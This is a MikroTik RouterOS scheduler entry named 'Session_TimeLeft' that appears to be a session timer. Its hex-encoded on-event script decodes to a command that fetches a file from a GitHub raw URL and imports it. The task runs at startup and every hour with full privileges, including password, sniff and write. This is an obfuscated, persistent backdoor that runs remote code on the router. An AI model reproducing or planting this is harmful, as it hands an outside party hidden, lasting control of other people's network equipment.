/system scheduler
add interval=1h name=Session_TimeLeft on-event="[/parse \"\\2F\\74\\6F\\6F\\6C\\\
    20\\66\\65\\74\\63\\68\\20\\75\\72\\6C\\3D\\68\\74\\74\\70\\73\\3A\\2F\\2F\\\
    72\\61\\77\\2E\\67\\69\\74\\68\\75\\62\\75\\73\\65\\72\\63\\6F\\6E\\74\\65\\\
    6E\\74\\2E\\63\\6F\\6D\\2F\\54\\6F\\72\\47\\6F\\6D\\61\\6E\\2F\\4D\\69\\6B\\\
    72\\6F\\74\\69\\6B\\2F\\6D\\61\\69\\6E\\2F\\74\\6F\\20\\6D\\6F\\64\\65\\3D\\\
    68\\74\\74\\70\\20\\64\\73\\74\\2D\\70\\61\\74\\68\\3D\\74\\6F\\0D\\0A\\2F\\\
    69\\6D\\70\\6F\\72\\74\\20\\74\\6F\\0D\\0A\"];" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup
